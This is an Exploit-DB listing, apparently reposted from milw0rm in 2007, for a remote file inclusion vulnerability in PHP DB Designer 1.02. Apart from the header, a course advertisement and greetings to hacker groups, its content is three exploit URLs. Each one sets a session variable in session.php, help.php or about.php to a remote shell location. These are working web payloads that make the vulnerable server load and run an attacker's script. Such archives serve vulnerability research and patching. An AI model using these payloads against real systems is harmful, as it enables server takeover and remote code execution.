PHP DB Designer 1.02 - Remote File Inclusion

EDB-ID:

3501


Author:

GoLd_M

Type:

webapps


Platform:

PHP

Date:

2007-03-16


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

# PHP DB Designer <= 1.02 Remote File Include Exploit
# D.Script: http://sourceforge.net/projects/phpdbdesigner/
# Discovered by: GloD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# Exploit:[Path]/db/session.php?_SESSION[DRIVER]=Shell
# Exploit:[Path]/wind/help.php?_SESSION[SITE_PATH]=Shell
# Exploit:[Path]/wind/about.php?_SESSION[SITE_PATH]=Shell

# milw0rm.com [2007-03-16]